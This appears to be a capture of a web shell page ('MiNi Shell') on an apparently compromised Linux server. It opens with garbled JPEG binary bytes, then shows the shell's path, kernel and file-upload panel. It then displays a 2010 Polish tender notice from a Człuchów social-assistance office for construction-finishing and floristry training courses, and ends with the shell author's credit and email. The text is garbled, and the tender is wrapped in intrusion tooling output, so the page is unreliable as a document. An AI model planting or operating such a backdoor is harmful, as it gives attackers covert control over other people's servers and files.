JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100607/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //proc/self/root/proc/self/root/home/vmanager/www/common/web/tenders/20100607/158116-N-2010.html

<p class="kh_header"><b>Człuchów: Organizację i przeprowadzenie szkoleń grupowych dla klientów MOPS Człuchów -  uczestników projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego pn.  Promocja Integracji Społecznej na terenie miasta Człuchowa
Część I Kurs - Wykańczanie wnętrz w budownictwie
Część II Kurs -  Florystyka</b><br>
<b>Numer ogłoszenia: 158116 - 2010; data zamieszczenia: 07.06.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Społecznej , ul. Średnia 14, 77-300 Człuchów, woj. pomorskie, tel. 0-59 8342409, 8344321, faks 0-59 8344321.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.mopsczluchow.neostrada.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Organizację i przeprowadzenie szkoleń grupowych dla klientów MOPS Człuchów -  uczestników projektu współfinansowanego ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego pn.  Promocja Integracji Społecznej na terenie miasta Człuchowa
Część I Kurs - Wykańczanie wnętrz w budownictwie
Część II Kurs -  Florystyka.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Część I 	Kurs - Wykańczanie wnętrz w budownictwie
cel szkolenia - szkolenie ma na celu przygotowanie teoretyczne i praktyczne do stosowania nowoczesnych technologii w budownictwie, 
liczba uczestników szkolenia - minimalnie 4 osoby, a maksymalnie 6 osób.,
liczba godzin - 220 godzin zegarowych w tym 150 godzin zajęć praktycznych
termin realizacji szkolenia -lipiec - wrzesień 2010r.przy czym, w lipcu odbywać się winny zajęcia teoretyczne , natomiast zajęcia praktyczne w m-cach sierpień - wrzesień, 
Zamawiający wymaga, aby:
-szkolenie odbywało się codziennie od poniedziałku do piątku po nie mniej niż 4 godziny zegarowe i nie więcej niż 6 godzin zegarowych dziennie; niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy;
-zajęcia odbywały się w godzinach od 08.00 do 14.00  (wyjątek stanowi środa - w godzinach od 08.00 do 13.00).
- zajęcia teoretyczne odbywały się:
w sali szkoleniowej Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14, 77-300 Człuchów
Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart
- zajęcia praktyczne odbywały się:
na terenie obiektów budowlanych znajdujących się na terenie miasta Człuchów, szczegółowo określonych przez Zamawiającego po wyborze najkorzystniejszej oferty, 
- w trakcie szkolenia powinny być zapewnione warunki pracy zgodnie 
z przepisami BHP;
Część II 	Kurs -  Florystyka
cel szkolenia: szkolenie ma na celu zdobycie umiejętności z zakresu układania bukietów i obsługi klienta
liczba uczestników - minimalnie 9  a maksymalnie 10 osób
liczba godzin -118 godzin zegarowych (w tym 82 zajęć praktycznych)
termin realizacji szkolenia - Wrzesień  - październik 2010r. przy czym, w sierpniu odbywać się winny zajęcia teoretyczne , natomiast we wrześniu - zajęcia praktyczne
Zamawiający wymaga, aby:
- szkolenie odbywało się codziennie od poniedziałku do piątku po nie mniej niż 4 godziny zegarowe i nie więcej niż 6 godzin zegarowych dziennie; niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy;
- zajęcia odbywały się w godzinach od 08.00 do 14.00  ( wyjątek stanowi środa - w godzinach od 08.00 do 13.00).
- zajęcia odbywały się:
sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14, 77-300 Człuchów
Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart
- w trakcie szkolenia powinny być zapewnione warunki pracy zgodnie 
z przepisami BHP;.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wnoszenia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony,  jeżeli wykonawca wykaże, nie później niż na dzień  składania  ofert,  że  posiada  wpis  do  rejestru  instytucji  szkoleniowych wystawione  przez  Wojewódzki  Urząd  Pracy  właściwy  dla  siedziby  instytucji  szkoleniowej /art. 20 ustawy z 	dnia 20 kwietnia 2004r. o promocji zatrudnienia i instytucjach rynku pracy (tekst jednolity :	Dz. U  z 2008r. - nr 69 poz. 415 z późn. zm.)/</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Wykonawcy winni udokumentować posiadanie wiedzy i doświadcze?nia poprzez wykazanie            realizacji conajmniej jednej usługi rodzajowo podobnej do przedmiotu zamówienia na które składa ofertę, w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres działalności jest krótszy to w tym okresie. Do wykazu należy dołączyć dokumenty potwierdzające, że w/w usługi zostały wykonane należycie (referencje, protokoły itp.).
Za usługę rodzajowo podobną zamawiający uzna:
- w Części I -  organizację i przeprowadzenie szkolenia o tematyce budowlanej,
- w Części II - organizację i przeprowadzenia szkolenia z zakresu florystyki.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>-</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający uzna ten warunek za spełniony, jeżeli wykonawca wykaże, nie później niż na dzień składania ofert, że dysponuje: 

- w Części I Kurs - Wykańczanie wnętrz w budownictwie

	a) co najmniej trzema wykładowcami/instruktorami, którzy winni
 	posiadać niżej wymienione kwalifikacje:
Wykładowca modułu BHP
 - osoba z wykształceniem wyższym
- przeprowadzenia min. 2 szkoleń z przedmiotowego tematu szkolenia
Wykładowca  modułu zawodowego - teoria
- osoba z wykształceniem wyższym;
- przeprowadzenia min. 3 szkoleń z przedmiotowego tematu szkolenia
Instruktor modułu zawodowego - praktyka
- osoba posiadająca min. wykształcenie zawodowe
- zatrudnienie min. 3 lata na stanowiskach związanych z budownictwem.
- w Części II	Kurs -  Florystyka

	a) co najmniej dwoma wykładowcami, którzy winni posiadać niżej 	wymienione kwalifikacje:
Wykładowca modułu obsługa klienta:
- osoba z wykształceniem wyższym
- przeprowadzenia min. 3 szkoleń
Wykładowca modułu florystyka:
- osoba z wykształceniem min. średnim;
- przeprowadzenia min. 3 szkoleń, o tematyce związanej z przedmiotem szkolenia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający nie wyznacza szczegółowego warunku w tym zakresie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">koncesję, zezwolenie lub licencję</li>

<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

<li style="margin-bottom: 12px;">wykonawca powołujący się przy wykazywaniu spełniania warunków udziału w postępowaniu na potencjał innych podmiotów, które będą brały udział w realizacji części zamówienia, przedkłada także dokumenty dotyczące tego podmiotu w zakresie wymaganym dla wykonawcy, określonym w pkt III.4.2.</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
<li style="margin-right: 20px;"><p class="justify"><span class="bold">III.4.3.2)</span> zaświadczenie właściwego organu sądowego lub administracyjnego miejsca zamieszkania albo zamieszkania osoby, której dokumenty dotyczą, w zakresie określonym w art. 24 ust. 1 pkt 4-8 ustawy - wystawione nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert - albo oświadczenie złożone przed notariuszem, właściwym organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego odpowiednio miejsca zamieszkania osoby lub kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, jeżeli w miejscu zamieszkania osoby lub w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się takiego zaświadczenia</p></li></ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>1)  Oświadczenie  o  spełnianiu  warunków  udziału  w  postępowaniu,  według  wzoru, stanowiącego załącznik nr 3 do siwz, 
W  przypadku  składania  oferty  wspólnej  ww.  oświadczenie  składa  pełnomocnik  w imieniu wykonawców składających ofertę wspólną. 
2) program szkolenia zgodnie z załącznikiem nr  6 do niniejszego siwz;
w przypadku składania oferty wspólnej należy złożyć jeden dokument
3)  ofertę cenową zgodnie z Rozdziałem I pkt 3 siwz; 
w przypadku składania oferty wspólnej należy złożyć jeden dokument</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 85</li>
<li>2 - Jakość usługi - 15</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>W uzasadnionych przypadkach Zamawiajacy może wyrazić w formie pisemnej, zgodnę na zmianę postanowień zawartej umowy w stosunku do treści umowy w zakresie: miejsca szkolenia, kadry wykładowców, terminu realizacji zamówienia. 
Zmiana miejsca szkolenia nie może prowadzić do obniżenia wymagań technicznych i funkcjonalnych. Zmiana kadry wykładowców może mieć wyłącznie charakter osobowy i nie może prowadzić do obniżenia wymagań wskazanych w części V SIWZ. Zmiana terminu realizacji zamówienia dopuszczalna jest wyłacznie w przypadku opóźnień związanych z procesem rekrutacji uczestników szkolenia.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http://www.mopsczluchow.neostrada.pl/zamowienia%20pupliczne.htm<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Społecznej w Człuchowie,77-300 Człuchów, ul. Średnia 14 SEKRETARIAT, pok. Nr 7,.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 11.06.2010 godzina 09:00, miejsce: Miejski Ośrodek Pomocy Społecznej w Człuchowie,77-300 Człuchów, ul. Średnia 14 SEKRETARIAT, pok. Nr 7,.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> zamówienie jest współfinansowany ze środków Unii Europejskiej w ramach Europejskiego Funduszu Społecznego.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> tak</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Część I 	Kurs - Wykańczanie wnętrz w budownictwie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cel szkolenia - szkolenie ma na celu przygotowanie teoretyczne i praktyczne do stosowania nowoczesnych technologii w budownictwie, 
liczba uczestników szkolenia - minimalnie 4 osoby, a maksymalnie 6 osób.,
liczba godzin - 220 godzin zegarowych w tym 150 godzin zajęć praktycznych
termin realizacji szkolenia -lipiec - wrzesień 2010r.przy czym, w lipcu odbywać się winny zajęcia teoretyczne , natomiast zajęcia praktyczne w m-cach sierpień - wrzesień, 
Zamawiający wymaga, aby:
-szkolenie odbywało się codziennie od poniedziałku do piątku po nie mniej niż 4 godziny zegarowe i nie więcej niż 6 godzin zegarowych dziennie; niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy;
-zajęcia odbywały się w godzinach od 08.00 do 14.00  (wyjątek stanowi środa - w godzinach od 08.00 do 13.00).
- zajęcia teoretyczne odbywały się:
w sali szkoleniowej Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14, 77-300 Człuchów
Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart
- zajęcia praktyczne odbywały się:
na terenie obiektów budowlanych znajdujących się na terenie miasta Człuchów, szczegółowo określonych przez Zamawiającego po wyborze najkorzystniejszej oferty, 
- w trakcie szkolenia powinny być zapewnione warunki pracy zgodnie 
z przepisami BHP;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.10.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. jakość usługi - 15</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Część II 	Kurs -  Florystyka.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> cel szkolenia: szkolenie ma na celu zdobycie umiejętności z zakresu układania bukietów i obsługi klienta
liczba uczestników - minimalnie 9  a maksymalnie 10 osób
liczba godzin -118 godzin zegarowych (w tym 82 zajęć praktycznych)
termin realizacji szkolenia - Wrzesień  - październik 2010r. przy czym, w sierpniu odbywać się winny zajęcia teoretyczne , natomiast we wrześniu - zajęcia praktyczne
Zamawiający wymaga, aby:
- szkolenie odbywało się codziennie od poniedziałku do piątku po nie mniej niż 4 godziny zegarowe i nie więcej niż 6 godzin zegarowych dziennie; niedopuszczalne jest zaplanowanie i prowadzenie zajęć w sobotę, niedzielę oraz dni ustawowo wolne od pracy;
- zajęcia odbywały się w godzinach od 08.00 do 14.00  ( wyjątek stanowi środa - w godzinach od 08.00 do 13.00).
- zajęcia odbywały się:
sala szkoleniowa Miejskiego Ośrodka Pomocy Społecznej  w Człuchowie, przy ul. Średniej 14, 77-300 Człuchów
Zamawiający udostępnia nieodpłatnie Wykonawcy, salę szkoleniową wyposażona w stoły, krzesła i flipchart
- w trakcie szkolenia powinny być zapewnione warunki pracy zgodnie 
z przepisami BHP;.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.09.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 85</li>
<li>2. jakość usługi - 15</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com